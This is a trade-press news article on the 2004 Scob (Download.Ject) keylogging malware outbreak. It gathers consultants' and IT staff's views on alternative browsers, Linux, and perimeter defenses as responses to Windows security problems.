Plenty of people are still seething about Scob, a new virus that uses keystroke logging to steal credit card numbers and other personal information. Beyond its special quirks, though, Scob is being seen as just the latest of many malware epidemics to blast through the holes in Microsoft’s software.
Armed with non-Microsoft browsers, alternative operating systems and perimeter-defense tools, channel members and customers keep dodging and blocking an ongoing barrage of viral bullets.
Also known as Download.Ject, Scob can infect Windows 2000 servers running IIS (Internet Information Server) 5.0 that haven’t been fixed with the MS04-011 patch. When users running IE (Internet Explorer) visit an affected Web site, they’re redirected to a Russian Web site that secretly installs a Trojan containing keystroke logging.
“Scob is a major concern to my customers. Viruses are getting way out of control,” attested Tasawar Jalali, president of SecureNode Inc., a security consulting firm serving midsized, high-tech firms in the Silicon Valley, along with some Fortune 500 corporations. Jalali estimated a 100 percent rise in viral outbreaks among his customers over the past six to nine months alone.
“It’s shocking that Microsoft had vulnerabilities in there which let users pick up this virus just by going to ordinary Web sites,” said Eric Smith, programmer/analyst for the Lawrence Berkeley National Labs’ Berkeley Drosophila Genome Project (BDGP).
“But I’m really glad that we don’t have to deal with Scob here,” added Smith, a staunch advocate of Linux and other non-Microsoft software.
Actually, any number of earlier viruses held the potential for keystroke logging, too, according to Jalali. “It just hasn’t really happened until now.”
In a series of interviews, channel members and users agreed that patches and third-party anti-viral software both can be helpful in stemming malware. But several said Microsoft’s patches can sometimes create new problems, too.
One response is to run a non-Microsoft browser on top of Windows. Robert Lazo, principal at The Beguine Group, a project management and software engineering consultancy in New York, said he uses Netscape’s Mozilla browser on his own desktop, in addition to “non-Outlook e-mail software.” Opera is another non-Microsoft browser that works on Windows.
Yet many others who are tired of patches have already broken away from Windows to non-Microsoft OSeseither on servers only, or on servers and desktops alike.
“I’ve seen a huge trend toward the use of Apache Web servers among our customers,” Jalali said. On the other hand, transitioning from Windows to Linux can pose some tough issues, he said. “Customers need systems administrators who are trained in Linux.”
Some companies, though, haven’t found the Linux knowledge barrier all that hard to break. Paul Bocheck, Ph.D., who heads up 24/7 Zone LLC, also operates his company’s Web site on Apache. For the desktop, Bocheck has settled on Red Hat Linux. Specializing in networked video, 24/7 Zone is a consultancy and software development firm based in Manhattan.
For his part, Smith became a SuSE Linux fan back in about 1995, when he was working in IT for an ad agency. A boss at the agency wanted to move to the NeXT OS. “But we didn’t have the bucks for NeXT, so we went to Linux.”
“If you don’t use Windows, you don’t have to put up with ActiveX,” Smith says.
When Smith first arrived at the BDGP two-and-a-half years ago, security constituted about 10 percent of his job. “Today, it’s around 40 percent,” he said.
The BDGP uses a genome database that still runs on Windows NT, but Smith has set up a Linux firewall to the outside world. Meanwhile, he’s moved other servers to Linux.
About 20 BDGP staff members are running Linux on the desktop, while the other 20 use Apple Macintoshes.
Smith cautions against the use of Microsoft’s IIS, in any case. “Don’t even touch it! Why bother? Windows wasn’t exactly built with security in mind. If you don’t use Windows, you don’t have to put up with ActiveX,” he recommended.
“And if you really need to have Microsoft Office or MS Project, I’d suggest running it on the Mac.”
But SecureNode’s Jalali claims that many end-users resist even non-Microsoft browsers, let alone non-Microsoft OSes.
“Lots of people in sales and marketing, for instance, really rely on MS Word, Excel and so forth. It’s true that Linux has come a long way with its desktop GUI. But there are still many misperceptions out there that Linux is much harder to useor even that it’s text-based only,” he said.
Jalali did try to move one of SecureNode’s customers from IE to Mozilla running on Windows.
“But acceptance was quite low. The end-users wanted to stick with a browser they already knew how to use. More than 60 percent of the users switched back to IE,” he recalled.
Click here to read about Mozilla Firefox, a browser nearing full release.
Jalali said he sees much more promise in perimeter-defense offerings such as Fortinet Inc.’s FortiGate antiviral firewall and Qualys Inc.’s Security On Demand service. Some of his customers have already stepped to products and services of this sort. “There’s plenty of room in this space for new vendors, as well,” he said.
Meanwhile, over at Berkeley, Smith is blocking viruses at the perimeter, too, leveraging a Linux-based intrusion-detection system.
Is Microsoft to blame for Scob and the slew of other malware that’s plagued Windows in recent years? Opinions vary on this question, too.
“It isn’t really Microsoft’s fault. Windows software is so widely used that people will always write viruses for it, no matter what Microsoft does. That’s why I think you have to block viruses at the perimeter,” Jalali said.
Smith conceded that Linux isn’t entirely impervious to viruses, either. “But unlike Linux, Windows is a closed operating system. This makes it much harder to tell whether you’ve been compromised, and to take action against it,” he said.
Check out eWEEK.com’s Security Center at http://security.eweek.com for security news, views and analysis. Be sure to add our eWEEK.com security news feed to your RSS newsreader or My Yahoo page: